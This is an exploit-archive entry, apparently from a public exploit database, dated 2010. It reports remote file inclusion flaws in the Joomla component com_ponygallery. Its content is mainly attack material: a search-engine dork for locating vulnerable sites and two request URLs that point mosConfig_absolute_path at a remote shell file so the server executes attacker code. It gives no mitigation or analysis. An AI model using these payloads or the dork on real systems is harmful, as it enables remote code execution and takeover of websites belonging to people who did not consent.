[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities
# Published : 2010-12-23
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Joomla Component com_adsmanager Remote File Inclusion Vulnerability
# Next Title : IPN Development Handler v2.0 Multiple Vulnerabilities


Joomla Component com_ponygallery Multiple Remote File Include
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,2874/chk,9056372cb7b40c9809ba7070ffde09f3/no_html,1/fname,PONYGALLERY_ML_2_5_1_INSTALL.zip.html
.:. Dork           : inurl:"com_ponygallery"

####################################################################

===[ Exploit ]===

www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]

####################################################################